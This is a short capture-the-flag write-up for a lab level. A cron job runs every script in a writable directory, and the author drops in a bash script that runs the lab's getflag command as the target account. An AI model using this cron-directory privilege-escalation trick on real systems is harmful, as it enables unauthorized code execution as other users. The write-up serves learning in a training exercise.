Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
25 lines (20 sloc) 778 Bytes

###Level 03

####Introduction In this example we are told to look at the directory /home/flag03 and that there is a crontab that runs every few minutes That directory contains the file writable.sh which contains the code

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

Which runs every file in the writable.d directory. I assume this is the file being run by the cron job.

####Exploit Since home/flag/03/writable.d is writable I create a simple bash script that will run the getflag command and pipe output to a file so that I can confirm it ran

#bin/bash
/bin/getflag >> /tmp/proof

I waited a few minutes and sure enough tmp/proof contained You have successfully executed getflag on a target account